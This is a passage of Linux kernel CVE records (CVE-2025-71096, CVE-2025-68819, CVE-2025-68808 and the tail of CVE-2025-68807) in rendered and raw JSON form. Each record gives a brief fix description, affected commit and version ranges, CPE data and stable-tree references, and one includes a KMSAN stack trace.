ELEVATOR_FLAG_ENABLE_WBT_ON_EXIT flag and its handling\n code since it\u0027s no longer needed\n\nThis ensures WBT is properly initialized before any IO can be submitted,\npreventing the counter from going negative."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:14.483Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f55201fb3becff6a903fd29f4d1147cc7e91eb0c"
},
{
"url": "https://git.kernel.org/stable/c/9869d3a6fed381f3b98404e26e1afc75d680cbf9"
}
],
"title": "block: fix race between wbt_enable_default and IO submission",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68807",
"datePublished": "2026-01-13T15:29:14.483Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-13T15:29:14.483Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71096 (GCVE-0-2025-71096)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly
The netlink response for RDMA_NL_LS_OP_IP_RESOLVE should always have a
LS_NLA_TYPE_DGID attribute, it is invalid if it does not.
Use the nl parsing logic properly and call nla_parse_deprecated() to fill
the nlattrs array and then directly index that array to get the data for
the DGID. Just fail if it is NULL.
Remove the for loop searching for the nla, and squash the validation and
parsing into one function.
Fixes an uninitialized read from the stack triggered by userspace if it
does not provide the DGID to a kernel initiated RDMA_NL_LS_OP_IP_RESOLVE
query.
BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]
BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
hex_byte_pack include/linux/hex.h:13 [inline]
ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509
ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633
pointer+0xc09/0x1bd0 lib/vsprintf.c:2542
vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930
vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279
vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426
vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465
vprintk+0x36/0x50 kernel/printk/printk_safe.c:82
_printk+0x17e/0x1b0 kernel/printk/printk.c:2475
ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]
ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141
rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259
netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]
netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346
netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896
sock_sendmsg_nosec net/socket.c:714 [inline]
__sock_sendmsg+0x333/0x3d0 net/socket.c:729
____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617
___sys_sendmsg+0x271/0x3b0 net/socket.c:2671
__sys_sendmsg+0x1aa/0x300 net/socket.c:2703
__compat_sys_sendmsg net/compat.c:346 [inline]
__do_compat_sys_sendmsg net/compat.c:353 [inline]
__se_compat_sys_sendmsg net/compat.c:350 [inline]
__ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350
ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371
do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]
__do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306
do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331
do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:3
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: ae43f8286730d1f2d241c34601df59f6d2286ac4 , < 376f46c8983458ead26cac83aa897a0b78491831 (git) |
| Linux | Linux | Affected: ae43f8286730d1f2d241c34601df59f6d2286ac4 , < bfe10318fc23e0b3f1d0a18dad387d29473a624d (git) |
| Linux | Linux | Affected: ae43f8286730d1f2d241c34601df59f6d2286ac4 , < 45532638de5da24c201aa2a9b3dd4b054064de7b (git) |
| Linux | Linux | Affected: ae43f8286730d1f2d241c34601df59f6d2286ac4 , < 9d85524789c2f17c0e87de8d596bcccc3683a1fc (git) |
| Linux | Linux | Affected: ae43f8286730d1f2d241c34601df59f6d2286ac4 , < acadd4097d25d6bd472bcb3f9f3eba2b5105d1ec (git) |
| Linux | Linux | Affected: ae43f8286730d1f2d241c34601df59f6d2286ac4 , < 0b948afc1ded88b3562c893114387f34389eeb94 (git) |
| Linux | Linux | Affected: ae43f8286730d1f2d241c34601df59f6d2286ac4 , < a7b8e876e0ef0232b8076972c57ce9a7286b47ca (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/addr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "376f46c8983458ead26cac83aa897a0b78491831",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
},
{
"lessThan": "bfe10318fc23e0b3f1d0a18dad387d29473a624d",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
},
{
"lessThan": "45532638de5da24c201aa2a9b3dd4b054064de7b",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
},
{
"lessThan": "9d85524789c2f17c0e87de8d596bcccc3683a1fc",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
},
{
"lessThan": "acadd4097d25d6bd472bcb3f9f3eba2b5105d1ec",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
},
{
"lessThan": "0b948afc1ded88b3562c893114387f34389eeb94",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
},
{
"lessThan": "a7b8e876e0ef0232b8076972c57ce9a7286b47ca",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/addr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly\n\nThe netlink response for RDMA_NL_LS_OP_IP_RESOLVE should always have a\nLS_NLA_TYPE_DGID attribute, it is invalid if it does not.\n\nUse the nl parsing logic properly and call nla_parse_deprecated() to fill\nthe nlattrs array and then directly index that array to get the data for\nthe DGID. Just fail if it is NULL.\n\nRemove the for loop searching for the nla, and squash the validation and\nparsing into one function.\n\nFixes an uninitialized read from the stack triggered by userspace if it\ndoes not provide the DGID to a kernel initiated RDMA_NL_LS_OP_IP_RESOLVE\nquery.\n\n BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]\n BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n hex_byte_pack include/linux/hex.h:13 [inline]\n ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509\n ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633\n pointer+0xc09/0x1bd0 lib/vsprintf.c:2542\n vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930\n vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279\n vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426\n vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465\n vprintk+0x36/0x50 kernel/printk/printk_safe.c:82\n _printk+0x17e/0x1b0 kernel/printk/printk.c:2475\n ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]\n ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141\n rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]\n rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]\n rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:714 
[inline]\n __sock_sendmsg+0x333/0x3d0 net/socket.c:729\n ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617\n ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671\n __sys_sendmsg+0x1aa/0x300 net/socket.c:2703\n __compat_sys_sendmsg net/compat.c:346 [inline]\n __do_compat_sys_sendmsg net/compat.c:353 [inline]\n __se_compat_sys_sendmsg net/compat.c:350 [inline]\n __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350\n ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371\n do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]\n __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306\n do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331\n do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:3"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:56.896Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/376f46c8983458ead26cac83aa897a0b78491831"
},
{
"url": "https://git.kernel.org/stable/c/bfe10318fc23e0b3f1d0a18dad387d29473a624d"
},
{
"url": "https://git.kernel.org/stable/c/45532638de5da24c201aa2a9b3dd4b054064de7b"
},
{
"url": "https://git.kernel.org/stable/c/9d85524789c2f17c0e87de8d596bcccc3683a1fc"
},
{
"url": "https://git.kernel.org/stable/c/acadd4097d25d6bd472bcb3f9f3eba2b5105d1ec"
},
{
"url": "https://git.kernel.org/stable/c/0b948afc1ded88b3562c893114387f34389eeb94"
},
{
"url": "https://git.kernel.org/stable/c/a7b8e876e0ef0232b8076972c57ce9a7286b47ca"
}
],
"title": "RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71096",
"datePublished": "2026-01-13T15:34:56.118Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-19T12:19:56.896Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68819 (GCVE-0-2025-68819)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
media: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()
rlen value is a user-controlled value, but dtv5100_i2c_msg() does not
check the size of the rlen value. Therefore, if it is set to a value
larger than sizeof(st->data), an out-of-bounds vuln occurs for st->data.
Therefore, we need to add proper range checking to prevent this vuln.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < c2c293ea7b61f12cdaad1e99a5b4efc58c88960a (git) |
| Linux | Linux | Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < c2305b4c5fc15e20ac06c35738e0578eb4323750 (git) |
| Linux | Linux | Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < 61f214a878e96e2a8750bf96a98f78c658dba60c (git) |
| Linux | Linux | Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < 4a54d8fcb093761e4c56eb211cf4e39bf8401fa1 (git) |
| Linux | Linux | Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < fe3e129ab49806aaaa3f22067ebc75c2dfbe4658 (git) |
| Linux | Linux | Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < ac92151ff2494130d9fc686055d6bbb9743a673e (git) |
| Linux | Linux | Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < b91e6aafe8d356086cc621bc03e35ba2299e4788 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/usb/dvb-usb/dtv5100.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c2c293ea7b61f12cdaad1e99a5b4efc58c88960a",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "c2305b4c5fc15e20ac06c35738e0578eb4323750",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "61f214a878e96e2a8750bf96a98f78c658dba60c",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "4a54d8fcb093761e4c56eb211cf4e39bf8401fa1",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "fe3e129ab49806aaaa3f22067ebc75c2dfbe4658",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "ac92151ff2494130d9fc686055d6bbb9743a673e",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "b91e6aafe8d356086cc621bc03e35ba2299e4788",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/usb/dvb-usb/dtv5100.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.28"
},
{
"lessThan": "2.6.28",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()\n\nrlen value is a user-controlled value, but dtv5100_i2c_msg() does not\ncheck the size of the rlen value. Therefore, if it is set to a value\nlarger than sizeof(st-\u003edata), an out-of-bounds vuln occurs for st-\u003edata.\n\nTherefore, we need to add proper range checking to prevent this vuln."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:23.950Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c2c293ea7b61f12cdaad1e99a5b4efc58c88960a"
},
{
"url": "https://git.kernel.org/stable/c/c2305b4c5fc15e20ac06c35738e0578eb4323750"
},
{
"url": "https://git.kernel.org/stable/c/61f214a878e96e2a8750bf96a98f78c658dba60c"
},
{
"url": "https://git.kernel.org/stable/c/4a54d8fcb093761e4c56eb211cf4e39bf8401fa1"
},
{
"url": "https://git.kernel.org/stable/c/fe3e129ab49806aaaa3f22067ebc75c2dfbe4658"
},
{
"url": "https://git.kernel.org/stable/c/ac92151ff2494130d9fc686055d6bbb9743a673e"
},
{
"url": "https://git.kernel.org/stable/c/b91e6aafe8d356086cc621bc03e35ba2299e4788"
}
],
"title": "media: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68819",
"datePublished": "2026-01-13T15:29:22.695Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-01-19T12:19:23.950Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68808 (GCVE-0-2025-68808)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
media: vidtv: initialize local pointers upon transfer of memory ownership
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: vidtv: initialize local pointers upon transfer of memory ownership
vidtv_channel_si_init() creates a temporary list (program, service, event)
and ownership of the memory itself is transferred to the PAT/SDT/EIT
tables through vidtv_psi_pat_program_assign(),
vidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().
The problem here is that the local pointer where the memory ownership
transfer was completed is not initialized to NULL. This causes the
vidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and
in the flow that jumps to free_eit, the memory that was freed by
vidtv_psi_*_table_destroy() can be accessed again by
vidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it
is freed once again.
Therefore, to prevent use-after-free and double-free vulnerability,
local pointers must be initialized to NULL when transferring memory
ownership.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 3be8037960bccd13052cfdeba8805ad785041d70 , < c342e294dac4988c8ada759b2f057246e48c5108 (git) |
| Linux | Linux | Affected: 3be8037960bccd13052cfdeba8805ad785041d70 , < 12ab6ebb37789b84073e83e4d9b14a5e0d133323 (git) |
| Linux | Linux | Affected: 3be8037960bccd13052cfdeba8805ad785041d70 , < 3caa18d35f1dabe85a3dd31bc387f391ac9f9b4e (git) |
| Linux | Linux | Affected: 3be8037960bccd13052cfdeba8805ad785041d70 , < fb9bd6d8d314b748e946ed6555eb4a956ee8c4d8 (git) |
| Linux | Linux | Affected: 3be8037960bccd13052cfdeba8805ad785041d70 , < a69c7fd603bf5ad93177394fbd9711922ee81032 (git) |
| Linux | Linux | Affected: 3be8037960bccd13052cfdeba8805ad785041d70 , < 30f4d4e5224a9e44e9ceb3956489462319d804ce (git) |
| Linux | Linux | Affected: 3be8037960bccd13052cfdeba8805ad785041d70 , < 98aabfe2d79f74613abc2b0b1cef08f97eaf5322 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/test-drivers/vidtv/vidtv_channel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c342e294dac4988c8ada759b2f057246e48c5108",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
},
{
"lessThan": "12ab6ebb37789b84073e83e4d9b14a5e0d133323",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
},
{
"lessThan": "3caa18d35f1dabe85a3dd31bc387f391ac9f9b4e",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
},
{
"lessThan": "fb9bd6d8d314b748e946ed6555eb4a956ee8c4d8",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
},
{
"lessThan": "a69c7fd603bf5ad93177394fbd9711922ee81032",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
},
{
"lessThan": "30f4d4e5224a9e44e9ceb3956489462319d804ce",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
},
{
"lessThan": "98aabfe2d79f74613abc2b0b1cef08f97eaf5322",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/test-drivers/vidtv/vidtv_channel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: initialize local pointers upon transfer of memory ownership\n\nvidtv_channel_si_init() creates a temporary list (program, service, event)\nand ownership of the memory itself is transferred to the PAT/SDT/EIT\ntables through vidtv_psi_pat_program_assign(),\nvidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().\n\nThe problem here is that the local pointer where the memory ownership\ntransfer was completed is not initialized to NULL. This causes the\nvidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and\nin the flow that jumps to free_eit, the memory that was freed by\nvidtv_psi_*_table_destroy() can be accessed again by\nvidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it\nis freed once again.\n\nTherefore, to prevent use-after-free and double-free vulnerability,\nlocal pointers must be initialized to NULL when transferring memory\nownership."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:16.763Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c342e294dac4988c8ada759b2f057246e48c5108"
},
{
"url": "https://git.kernel.org/stable/c/12ab6ebb37789b84073e83e4d9b14a5e0d133323"
},
{
"url": "https://git.kernel.org/stable/c/3caa18d35f1dabe85a3dd31bc387f391ac9f9b4e"
},
{
"url": "https://git.kernel.org/stable/c/fb9bd6d8d314b748e946ed6555eb4a956ee8c4d8"
},
{
"url": "https://git.kernel.org/stable/c/a69c7fd603bf5ad93177394fbd9711922ee81032"
},
{
"url": "https://git.kernel.org/stable/c/30f4d4e5224a9e44e9ceb3956489462319d804ce"
},
{
"url": "https://git.kernel.org/stable/c/98aabfe2d79f74613abc2b0b1cef08f97eaf5322"
}
],
"title": "media: vidtv: initialize local pointers upon transfer of memory ownership",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68808",
